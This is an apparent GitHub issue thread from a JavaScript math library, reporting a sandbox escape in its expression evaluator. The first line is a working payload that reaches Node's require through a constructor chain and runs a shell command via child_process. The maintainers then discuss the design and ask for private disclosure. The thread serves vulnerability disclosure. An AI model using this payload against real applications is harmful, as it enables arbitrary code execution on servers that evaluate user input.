more eval exploits #821
math.eval('["//","a/*\\nreturn process.mainModule.require"]._data.map(cos.constructor)()("child_process").execSync("ps >&2")');
Unfortunately, this is pretty much a fundamentally insecure design.
Thanks a lot @comex
Can you elaborate why you think this is the case?
So far the security issues that I've seen all boil down to accessing
As a side note: @comex I would prefer reporting new security issues in private rather than here in a public issue. We plug them asap but it may not always be possible to apply a fast fix for whatever reason.